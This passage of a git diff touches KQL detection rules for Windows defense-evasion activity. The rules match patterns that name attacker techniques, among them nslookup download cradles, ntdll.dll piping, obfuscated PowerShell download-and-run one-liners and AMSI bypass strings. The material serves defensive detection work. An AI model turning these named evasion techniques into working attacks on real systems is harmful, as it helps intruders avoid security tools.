2022-09-05 +// Level: medium +// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql index bed879da..de464966 100644 --- a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql +++ b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql @@ -1,10 +1,10 @@ -// Title: NtdllPipe Like Activity Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-05 -// Level: high -// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: NtdllPipe Like Activity Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-05 +// Level: high +// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql index 9e11b022..68f83ce2 100644 --- a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql +++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql @@ -1,14 +1,14 @@ -// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM -// Author: Meroujan Antonyan (vx3r) -// Date: 2025-05-27 -// Level: high -// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). -// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting -// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection -// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with -// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM +// Author: Meroujan Antonyan (vx3r) +// Date: 2025-05-27 +// Level: high +// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). +// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting +// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection +// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with +// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql index 13ec9462..ce369ca5 100644 --- a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql +++ b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql @@ -1,10 +1,10 @@ -// Title: Obfuscated PowerShell OneLiner Execution -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-05-09 -// Level: high -// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001 - -DeviceProcessEvents +// Title: Obfuscated PowerShell OneLiner Execution +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-05-09 +// Level: high +// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql index d5d6c6d0..50efda01 100644 --- a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql +++ b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql @@ -1,12 +1,12 @@ -// Title: Odbcconf.EXE Suspicious DLL Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-22 -// Level: high -// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.008 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Odbcconf.EXE Suspicious DLL Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql index a715d372..6bf2b8c2 100644 --- a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql +++ b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql @@ -1,12 +1,12 @@ -// Title: Office Application Initiated Network Connection Over Uncommon Ports -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-07-12 -// Level: medium -// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control -// False Positives: -// - Other ports can be used, apply additional filters accordingly - -DeviceNetworkEvents +// Title: Office Application Initiated Network Connection Over Uncommon Ports +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-12 +// Level: medium +// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control +// False Positives: +// - Other ports can be used, apply additional filters accordingly + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql index 7fbac1fe..79517046 100644 --- a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql +++ b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql @@ -1,12 +1,12 @@ -// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-05 -// Level: medium -// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate enabling of the old tls versions due to incompatibility - -DeviceRegistryEvents +// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: medium +// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate enabling of the old tls versions due to incompatibility + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql index bcda8393..a10c127d 100644 --- a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: OneNote Attachment File Dropped In Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-22 -// Level: medium -// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of ".one" or ".onepkg" files from those locations - -DeviceFileEvents +// Title: OneNote Attachment File Dropped In Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of ".one" or ".onepkg" files from those locations + +DeviceFileEvents | where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql index 25eb58fd..f7a4abcf 100644 --- a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql +++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql @@ -1,13 +1,13 @@ -// Title: OneNote.EXE Execution of Malicious Embedded Scripts -// Author: @kostastsale -// Date: 2023-02-02 -// Level: high -// Description: Detects the execution of malicious OneNote documents that contain embedded scripts. -// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: OneNote.EXE Execution of Malicious Embedded Scripts +// Author: @kostastsale +// Date: 2023-02-02 +// Level: high +// Description: Detects the execution of malicious OneNote documents that contain embedded scripts. +// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql index 268f65c5..f14437f7 100644 --- a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql +++ b/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql @@ -1,10 +1,10 @@ -// Title: OpenWith.exe Executes Specified Binary -// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea) -// Date: 2019-10-12 -// Level: high -// Description: The OpenWith.exe executes other binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: OpenWith.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea) +// Date: 2019-10-12 +// Level: high +// Description: The OpenWith.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql index c5ad1551..420bbeae 100644 --- a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql +++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql @@ -1,11 +1,11 @@ -// Title: Outbound Network Connection Initiated By Cmstp.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-30 -// Level: high -// Description: Detects a network connection initiated by Cmstp.EXE -// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.003 - -DeviceNetworkEvents +// Title: Outbound Network Connection Initiated By Cmstp.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects a network connection initiated by Cmstp.EXE +// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql index 7a45bdbf..f38685ec 100644 --- a/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql +++ b/KQL/rules/Defense Evasion/outbound_network_connection_to_public_ip_via_winlogon.kql @@ -1,12 +1,12 @@ -// Title: Outbound Network Connection To Public IP Via Winlogon -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2023-04-28 -// Level: medium -// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011 -// False Positives: -// - Communication to other corporate systems that use IP addresses from public address spaces - -DeviceNetworkEvents +// Title: Outbound Network Connection To Public IP Via Winlogon +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2023-04-28 +// Level: medium +// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011 +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql index f4897dc8..e1e7be01 100644 --- a/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql +++ b/KQL/rules/Defense Evasion/outgoing_logon_with_new_credentials.kql @@ -1,12 +1,12 @@ -// Title: Outgoing Logon with New Credentials -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-04-06 -// Level: low -// Description: Detects logon events that specify new credentials -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550 -// False Positives: -// - Legitimate remote administration activity - -DeviceLogonEvents +// Title: Outgoing Logon with New Credentials +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: low +// Description: Detects logon events that specify new credentials +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1550 +// False Positives: +// - Legitimate remote administration activity + +DeviceLogonEvents | where LogonType == 9 \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql index 0781adc6..244cfed8 100644 --- a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql +++ b/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql @@ -1,10 +1,10 @@ -// Title: Password Provided In Command Line Of Net.EXE -// Author: Tim Shelton (HAWK.IO) -// Date: 2021-12-09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078 - -DeviceProcessEvents +// Title: Password Provided In Command Line Of Net.EXE +// Author: Tim Shelton (HAWK.IO) +// Date: 2021-12-09 +// Level: medium +// Description: Detects a when net.exe is called with a password in the command line +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078 + +DeviceProcessEvents | where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql index 641540a3..310bd1a4 100644 --- a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql +++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql @@ -1,13 +1,13 @@ -// Title: PDF File Created By RegEdit.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-07-08 -// Level: high -// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. -// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: PDF File Created By RegEdit.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-08 +// Level: high +// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. +// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/Defense Evasion/ping_hex_ip.kql index 3d380ea3..2c8c6cb8 100644 --- a/KQL/rules/Defense Evasion/ping_hex_ip.kql +++ b/KQL/rules/Defense Evasion/ping_hex_ip.kql @@ -1,12 +1,12 @@ -// Title: Ping Hex IP -// Author: Florian Roth (Nextron Systems) -// Date: 2018-03-23 -// Level: high -// Description: Detects a ping command that uses a hex encoded IP address -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1140, attack.t1027 -// False Positives: -// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form - -DeviceProcessEvents +// Title: Ping Hex IP +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-23 +// Level: high +// Description: Detects a ping command that uses a hex encoded IP address +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.t1027 +// False Positives: +// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form + +DeviceProcessEvents | where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql index a7595a4a..a24b501c 100644 --- a/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_7za_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential 7za.DLL Sideloading -// Author: X__Junior -// Date: 2023-06-09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. - -DeviceImageLoadEvents +// Title: Potential 7za.DLL Sideloading +// Author: X__Junior +// Date: 2023-06-09 +// Level: low +// Description: Detects potential DLL sideloading of "7za.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. + +DeviceImageLoadEvents | where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql index 8b98624d..13d64694 100644 --- a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql +++ b/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql @@ -1,12 +1,12 @@ -// Title: Potential Adplus.EXE Abuse -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-09 -// Level: high -// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001 -// False Positives: -// - Legitimate usage of Adplus for debugging purposes - -DeviceProcessEvents +// Title: Potential Adplus.EXE Abuse +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: high +// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001 +// False Positives: +// - Legitimate usage of Adplus for debugging purposes + +DeviceProcessEvents | where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql index c052d00a..ba5a1327 100644 --- a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql +++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql @@ -1,10 +1,10 @@ -// Title: Potential AMSI Bypass Using NULL Bits -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-04 -// Level: medium -// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Potential AMSI Bypass Using NULL Bits +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-04 +// Level: medium +// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql index 6defa1db..941c62c3 100644 --- a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql +++ b/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql @@ -1,12 +1,12 @@ -// Title: Potential AMSI Bypass Via .NET Reflection -// Author: Markus Neis, @Kostastsale -// Date: 2018-08-17 -// Level: high -// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential AMSI Bypass Via .NET Reflection +// Author: Markus Neis, @Kostastsale +// Date: 2018-08-17 +// 